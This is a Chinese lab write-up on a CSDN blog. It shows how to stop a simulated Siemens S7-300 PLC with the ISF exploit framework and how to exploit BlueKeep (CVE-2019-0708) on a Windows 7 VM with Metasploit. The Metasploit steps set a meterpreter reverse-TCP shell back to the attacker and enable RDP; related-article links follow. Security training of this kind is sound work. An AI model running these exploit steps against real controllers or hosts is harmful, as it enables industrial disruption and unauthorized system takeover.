西门子S7-300启停

最新推荐文章于 2024-09-12 10:54:39 发布
最新推荐文章于 2024-09-12 10:54:39 发布
阅读量770 收藏 17
点赞数 20
文章标签: 网络 linux 服务器 git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/abc3106887422/article/details/135122249
版权

一、西门子S7-300启停

实验

1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境
2.kali中安装工控漏洞利用框架 ISF
(1)在kali终端中使用命令:
git clone https://github.com/dark-lbp/isf/
在这里插入图片描述

(2)输入cd isf
在这里插入图片描述

(3)这时有可能会报错:缺少nmap模块,方法:
A.克隆下载nmap模块的包
git clone https://github.com/johanlundberg/python-nmap
在这里插入图片描述

B.进入文件夹使用命令python2 setup.py install
在这里插入图片描述

C.进入python2中import nmap发现没有报错了,使用exit()退出
在这里插入图片描述

D.继续执行 python2 isf.py命令进行安装
在这里插入图片描述

3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径
(1).用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中
(2)在serverdemo.exe界面先点击start启动server
在这里插入图片描述

(3)可以查看到serverdemo.exe下面日志就显示serverstarted
(4)clientdemo.exe界面上填写上物理机ip
(5)clientdemo.exe界面上点击connect连接
在这里插入图片描述

(6)这时继续查看server的日志,显示client已经added(serverdemo.exe)
4.打开ISF后,输入:
use exploits/plcs/siemens/s7_300_400_plc_control
在这里插入图片描述

5.show options;set target 物理机IP
在这里插入图片描述

6.run
在这里插入图片描述

这里显示 stop plc ,同时查看模拟器中的输出,可以发现已经停止
在这里插入图片描述

二、利用windows 7 cve-2019-0708漏洞

环境准备
说明:该漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。
这意味着该漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。

在这里插入图片描述

1.开启Kali虚拟机和win7靶机
2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:
在这里插入图片描述
3.若3389没打开,可以右键计算机,选择属性
在这里插入图片描述

4.选择远程设置
在这里插入图片描述
5.选择允许远程连接
在这里插入图片描述

7.5.2 利用windows 7 cve-2019-0708漏洞案例
1.kali中使用nmap扫描目标机器端口确认是否开启3389端口:
nmap 192.168.11.133(win7IP)
在这里插入图片描述

2.确认开启后启动msfconsole
在这里插入图片描述

  1. 搜索漏洞:
    search 0708
    在这里插入图片描述

前两个模块,一个是扫描功能,一个是攻击功能。
4.使用攻击功能,也就是第二个模块:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
在这里插入图片描述
5.设置目标:
set rhost 被攻击ip #设置win7ip
set rport 3389

在这里插入图片描述

6.设置payload:
set payload windows/x64/meterpreter/reverse_tcp #设置64位的payload如果是32位机器则不用加x64
在这里插入图片描述

7.设置攻击机:
set lhost 攻击者ip #设置kali的ip
set lport 4444 #设置攻击者的监听端口(端口可以随意更改)
在这里插入图片描述

8.输入:show targets,显示可以选择的靶机的架构
在这里插入图片描述
9.用于vm是15.5.1,所以可以选择target 3-5
在这里插入图片描述

10.选择target 3,进行尝试:
set target 5
11.进行攻击,运行:run
在这里插入图片描述

12.假如可以建立连接,输入:
run post/windows/manage/enable_rdp
运行远程桌面模块
在这里插入图片描述

13.另开一个kali终端,输入:
rdesktop win7靶机IP
在这里插入图片描述

abc3106887422
关注
工业互联网安全-西门子S7-300启停
hst12300的博客
11-21 193
【代码】工业互联网安全-西门子S7-300启停
西门子S7-300启停——从基础到实践
hetian415的博客
12-31 1166
1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境2.kali中安装工控漏洞利用框架 ISF(1)在kali终端中使用命令:git clone输入cd isf输入python2 isf.py(4)这时有可能会报错:缺少nmap模块,方法:A.克隆下载nmap模块的包git cloneB.进入文件夹使用命令Python2 setup.py insall。
一个常开按钮控制启停_西门子plc按钮控制启停(梯形图)
热门推荐
weixin_28686915的博客
01-17 1万+
最近做了一个按钮控制输出的程序,分享给大家,希望对大家的工作有所帮助。1、图1:按钮计数。图1:停止脉冲为上位机按钮(脉冲)图1中“停止脉冲”为上位机按钮,每点一次按钮则有一个脉冲信号,C10计数器就会加1,计数从零开始(图中的C#0代表计数从0开始计数),并将累加值输入到MW10。2,图2:图2,:停止信号接输出信号图2中“停止信号”可以接PLC输出,当计数器的计数输出MW100(图1的计数...
PLC 按钮启停的几种方法
qq_34415156的博客
10-10 5251
最近面试发现和PLC相关的面试都愿意问这个问题,我把几种思路整理一下。
11.20西门子S7-300启停
2303_77686186的博客
11-20 132
通过使用西门子S7-300控制系统,不仅可以实现设备的启停控制,还能够实现设备的自动化,提高生产效率和安全性。3. 控制设备状态:通过启停模块控制设备的启停,可以监测设备运行状态、加工品质并对设备进行维护和保养。同时,由于设备状态信息可以通过该模块获取,可以帮助生产管理人员更好地了解设备的使用情况,从而改进生产流程及管理。(1).使用serverdemo.exe模拟PLC设备,用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中。(3)输入python2 isf.py。
西门子S7-300启停,附带学习经验
2401_84140060的博客
04-09 937
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
西门子S7300启停
2301_78160271的博客
11-20 158
西门子S7-300是一种先进的工业自动化控制系统。在S7-300中,启动和停止的功能与其他控制器类似。总之,S7-300启停功能需要合理的电路设计、PLC程序编写和信号触发控制,通过这些步骤可以实现对工业自动化系统的高效控制。作用1. 控制电机启停:通过控制启停模块的输出信号,可以实现电机的启动和停止。这对于生产过程中需要频繁启停的机器和设备特别重要,可以提高生产效率和安全性。2. 实现设备自动化:启停模块可以配合其他传感器和执行器,放置在生产线上,实现自动化生产过程。
​数据链路层——流量控制&可靠传输机制 ​
qq_25467441的博客
09-09 732
例题:一个信道的数据传输率为4kb/s ,向传播时延为30ms ,如果使停止-等待协议的信道最大利用率达到80%,要求的数据帧长度至少为。设数据帧的长度为L比特,则发送方发送全部的数据需要时间:L/4。“停止-等待”就是每发送完一个分组就停止发送,等待对方确认,在收到确认后再发送下一个分组。因为是在讨论可靠传输的原理,所以并不考虑数据是在哪一个层次上传送的。发送方在一个发送周期内,有效地发送数据所需要的时间占整个发送周期的比率。数据链路层的流量控制是点对点的,而传输层的流量控制是端到端的。
200 Gb/s和400 Gb/s网络
dncsk的专栏
09-07 1428
116.200 Gb/s和400 Gb/s网络简介写在前面 :1.需要英文原文请自行官网下载2.本人无授权故亦不接受相关付费服务 如有商业性需求建议寻找有资质的书籍供应商购买3.翻译纯粹为爱发电,因为机器翻译所以错乱较多 建议参照英文原文对比使用 4.欢迎评论区提出建议或意见 原则上不删除评论 原则上不回复私信 和解呈现200GBASE-RPCSPMDIEEEStd802.3-2022,IEEE以太网标准第八节116.200Gb/s和400Gb/s网络116.1概述116.1范围本条款描述了200千兆位和4
[网络]HTTP协议 Cookie与Session
m0_74910646的博客
09-07 782
HTTP Cookie(也称为 Web Cookie、浏览器 Cookie 或简称 Cookie)是服务器发送到 用户浏览器并保存在浏览器上的一小块数据,它会在浏览器之后向同一服务器再次发 起请求时被携带并发送到服务器上。通常,它用于告知服务端两个请求是否来自同一浏览器,如保持用户的登录状态、记录用户偏好等。HTTP Session 是服务器用来跟踪用户与服务器交互期间用户状态的机制。由于 HTTP 协议是无状态的(每个请求都是独立的),因此服务器需要通过 Session 来记住用户的信息。
145-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务
DamnVanish的博客
09-07 856
Linux中最强权限维持rootkit
亚信安全出席第五届国际反病毒大会 探究AI现代网络勒索治理
亚信安全官方账号的博客
09-09 464
亚信安全出席活动并发表题为《AI时代下现代网络勒索治理》的演讲
网络分析仪仪器校准要怎么进行检测?容易出现哪些误差?
最新发布
2401_83476848的博客
09-12 262
误差修正是对已知校准标准的测量,这些测量值存储在分析仪的存储器之中,数据用于计算误差模型。系统误差是由矢量网络分析仪和测试设置之中的缺陷引起的,是重复性误差,并假设它不随时间变化。校准件的使用可以达到减少误差的目的。2.开关重复性误差:分析仪中用于切换源衰减器设置的机械式RF开关,有时当机械式RF开关被启动时,触点的闭合方式与上次启动时不同。通过仪器校准措施增强,消除反射测量之中的三个系统误差:指向性、源匹配、频率响应。:是由于仪器或测试系统仪器校准之后性能发生变化引起的,主要是温度变化引起的。
综合DHCP、ACL、NAT、Telnet和PPPoE进行网络设计练习
m0_62909438的博客
09-07 1150
通过学习到的DHCP、NAT、ACL、Telnet和PPPoE技术,进行综合实验配置,掌握这些技术的配置,了解其用法,加深命令印象。
西门子S7-300 PLC教程:从基础到实践
"Siemens PRG S7-300教程从入门到精通(中文).pdf" Siemens的S7-300系列是一种模块化PLC(可编程逻辑控制器),它由多个组件构成,包括机架、中央处理元(CPU)模块、输入和输出模块、功能模块、接口模块、通信...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值